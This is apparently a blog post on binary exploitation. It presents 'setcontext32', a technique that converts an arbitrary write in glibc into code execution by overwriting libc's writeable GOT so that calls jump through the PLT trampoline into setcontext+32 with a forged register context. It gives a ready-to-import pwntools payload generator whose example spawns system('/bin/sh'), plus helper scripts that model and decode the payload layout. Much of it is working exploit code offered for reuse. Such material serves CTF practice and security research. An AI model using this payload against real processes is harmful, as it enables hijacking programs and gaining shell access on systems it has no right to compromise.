modern arb write -> rce is hard

Currently, converting an arbitrary write primitive into RCE is a messy process. The good old days of __free_hook are long gone; now you've got to leak the pointer mangling cookie to modify an existing __exit_funcs entry, maybe compute the offset to ld.so to overwrite l_addr and create a fake DT_FINI entry, or perhaps set up special _codecvt and _wide_data structures on hijacked IO objects. I'd just like to specify the function I want to call and its arguments!

I want a flexible RCE primitive. I don't want to rely on _IO_cleanup, _dl_fini, or malloc to call my injected code. I want an inherently universal gadget, a gadget I can expect to be called with the most messed up heap bins and broken IO objects. I want to be able to call any function with any set of arguments without needing to stack pivot or pray system is stack aligned. I don't want to satisfy several constraints so one_gadget will work!

setcontext32

setcontext32 is a neat method to convert arbitrary write to flexible arbitrary code execution. Roughly, it looks like:

    write(libc_write_address, flat(
        p64(0),
        p64(libc_write_address + 0x218),
        p64(setcontext+32),
        p64(libc_exe_address) * 0x40,
        cpu_state_information,
    ))

Here, libc_write_address is the start of the writeable page in libc, libc_exe_address is the start of the executable page in libc, and cpu_state_information is a structure holding the values to load into the registers, including rsp and rip.
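The 0x218 offset falls out of the layout: three reserved GOT slots plus 0x40 overwritten entries, eight bytes each. Here is a minimal stdlib-only sketch of that arithmetic, assuming the write starts at GOT[0]. `build_layout`, `ucontext_offset`, and every address in it are hypothetical placeholders, not part of the original:

```python
import struct

SLOT_SIZE = 8            # one 64-bit GOT slot
RESERVED_SLOTS = 3       # GOT[0], GOT[1] (link_map), GOT[2] (resolver)
OVERWRITTEN_SLOTS = 0x40 # function slots sprayed in the sketch above


def ucontext_offset() -> int:
    """Offset from the start of the write to the fake context."""
    return (RESERVED_SLOTS + OVERWRITTEN_SLOTS) * SLOT_SIZE


def build_layout(write_addr: int, exe_addr: int, setcontext_addr: int,
                 cpu_state: bytes) -> bytes:
    """Assemble header, sprayed slots, and context in payload order."""
    header = struct.pack(
        "<3Q",
        0,                               # GOT[0], unused here
        write_addr + ucontext_offset(),  # GOT[1], fake link_map
        setcontext_addr + 32,            # GOT[2], fake resolver
    )
    spray = struct.pack("<Q", exe_addr) * OVERWRITTEN_SLOTS
    return header + spray + cpu_state


# Placeholder addresses, chosen only to make the arithmetic visible.
payload = build_layout(0x10000, 0x20000, 0x30000, b"\x00" * 0x200)
print(hex(ucontext_offset()), hex(len(payload)))
```

If a target libc has more GOT entries than 0x40, the slot count and the context offset would both need to move together.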

high level overview

Every GOT entry in libc, such as those for memset, memcpy, strcpy, and strlen, is replaced with the address of the PLT trampoline, which sits at the beginning of the executable page. The PLT trampoline pushes a fake link_map pointer, libc_write_address + 0x218, and jumps to a fake runtime resolver, setcontext+32. Both values are read from the beginning of the writeable page.

setcontext+32 pops libc_write_address + 0x218 off the stack, and treats it as a pointer to a saved ucontext_t. It'll then load your structure as the current CPU state.
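The control flow above can be modelled in a few lines. This is a toy simulation, not real execution: it reads a fake memory image the way the trampoline and setcontext+32 are described here, and only reports the values that would be loaded. `simulate_dispatch` and all addresses are hypothetical; the 0xA0 and 0xA8 offsets are the ones create_ucontext uses in this post.

```python
import struct

UCONTEXT_OFF = 0x218            # offset of the fake context in the payload
RSP_OFF, RIP_OFF = 0xA0, 0xA8   # offsets used by create_ucontext in this post


def simulate_dispatch(memory: bytes, base: int) -> dict:
    """Model: trampoline pushes GOT[1], jumps to GOT[2], which pops it."""
    def read_q(addr: int) -> int:
        return struct.unpack_from("<Q", memory, addr - base)[0]

    stack = []
    stack.append(read_q(base + 8))   # trampoline: push GOT[1]
    target = read_q(base + 16)       # trampoline: jump to GOT[2]
    ctx = stack.pop()                # setcontext+32: pop context pointer
    return {
        "jump_target": target,
        "ctx": ctx,
        "rsp": read_q(ctx + RSP_OFF),
        "rip": read_q(ctx + RIP_OFF),
    }


# Build a fake writeable page with placeholder values.
BASE = 0x7000_0000
FAKE_SETCONTEXT_32 = 0x4141_4141
ctx_blob = bytearray(0x200)
struct.pack_into("<Q", ctx_blob, RSP_OFF, 0x1234_5000)
struct.pack_into("<Q", ctx_blob, RIP_OFF, 0xDEAD_BEEF)
memory = (
    struct.pack("<3Q", 0, BASE + UCONTEXT_OFF, FAKE_SETCONTEXT_32)
    + struct.pack("<Q", 0x5000_0000) * 0x40
    + bytes(ctx_blob)
)

result = simulate_dispatch(memory, BASE)
print({name: hex(value) for name, value in result.items()})
```

The point of the model is that the pushed "link_map" and the popped context pointer are the same value, which is why no stack pivot is needed.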

Calling most libc functions will trigger setcontext32, including malloc, exit, and (almost?) every IO operation.

why

libc's GOT is writeable so that it can be pointed at architecture-specific implementations, such as a memcpy optimized for SSE or AVX512. A friend also guessed that it could be for ltrace. I learned the libc GOT was writeable from pwndbg creator disconnect3d.

code

Here's code you can readily import to generate setcontext32 payloads (or integrate into your pwn libraries). An example is below.
setcontext32.py

    from pwn import *


    def create_ucontext(
        src: int,
        rsp=0, rbx=0, rbp=0,
        r12=0, r13=0, r14=0, r15=0,
        rsi=0, rdi=0, rcx=0, r8=0, r9=0, rdx=0,
        rip=0xDEADBEEF,
    ) -> bytearray:
        # Fake context: only the fields read by setcontext+32 are filled in.
        b = bytearray(0x200)
        b[0xE0:0xE8] = p64(src)  # fldenv ptr
        b[0x1C0:0x1C8] = p64(0x1F80)  # ldmxcsr
        b[0xA0:0xA8] = p64(rsp)
        b[0x80:0x88] = p64(rbx)
        b[0x78:0x80] = p64(rbp)
        b[0x48:0x50] = p64(r12)
        b[0x50:0x58] = p64(r13)
        b[0x58:0x60] = p64(r14)
        b[0x60:0x68] = p64(r15)
        b[0xA8:0xB0] = p64(rip)  # ret ptr
        b[0x70:0x78] = p64(rsi)
        b[0x68:0x70] = p64(rdi)
        b[0x98:0xA0] = p64(rcx)
        b[0x28:0x30] = p64(r8)
        b[0x30:0x38] = p64(r9)
        b[0x88:0x90] = p64(rdx)
        return b


    def setcontext32(libc: ELF, **kwargs) -> tuple[int, bytes]:
        # Returns (address to write to, payload bytes).
        got = libc.address + libc.dynamic_value_by_tag("DT_PLTGOT")
        plt_trampoline = libc.address + libc.get_section_by_name(".plt").header.sh_addr
        return got, flat(
            p64(0),
            p64(got + 0x218),  # fake link_map: points at the context below
            p64(libc.symbols["setcontext"] + 32),  # fake runtime resolver
            p64(plt_trampoline) * 0x40,  # every GOT entry -> PLT trampoline
            create_ucontext(got + 0x218, rsp=libc.symbols["environ"] + 8, **kwargs),
        )


    if __name__ == "__main__":
        libc = ELF("./libc.so.6")
        # Inside this file setcontext32 is the function itself, so call it directly.
        dest, payload = setcontext32(
            libc, rip=libc.sym["system"], rdi=next(libc.search(b"/bin/sh"))
        )
        print(hex(dest), payload.hex())
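Before sending a payload, it can help to decode the context blob and confirm each register landed at the intended offset. The following is a stdlib-only sketch; `describe_ucontext` is a hypothetical helper, and its offset table is simply copied from create_ucontext above rather than taken from any header.

```python
import struct

# Offsets copied from create_ucontext in this post.
UCONTEXT_FIELDS = {
    "r8": 0x28, "r9": 0x30,
    "r12": 0x48, "r13": 0x50, "r14": 0x58, "r15": 0x60,
    "rdi": 0x68, "rsi": 0x70, "rbp": 0x78, "rbx": 0x80,
    "rdx": 0x88, "rcx": 0x98, "rsp": 0xA0, "rip": 0xA8,
    "fldenv_ptr": 0xE0, "mxcsr": 0x1C0,
}


def describe_ucontext(blob: bytes) -> dict:
    """Map each known field name to the 64-bit value stored at its offset."""
    needed = max(UCONTEXT_FIELDS.values()) + 8
    if len(blob) < needed:
        raise ValueError(f"context blob too short: {len(blob)} < {needed}")
    return {
        name: struct.unpack_from("<Q", blob, offset)[0]
        for name, offset in UCONTEXT_FIELDS.items()
    }


# Demo blob with placeholder values (not real libc addresses).
demo = bytearray(0x200)
struct.pack_into("<Q", demo, 0x68, 0x1111_2222)   # rdi
struct.pack_into("<Q", demo, 0xA8, 0x3333_4444)   # rip
struct.pack_into("<Q", demo, 0x1C0, 0x1F80)       # mxcsr

regs = describe_ucontext(bytes(demo))
for name, value in regs.items():
    if value:
        print(f"{name:>10} = {value:#x}")
```

With the payload from setcontext32, the blob to decode would be the slice starting at offset 0x218.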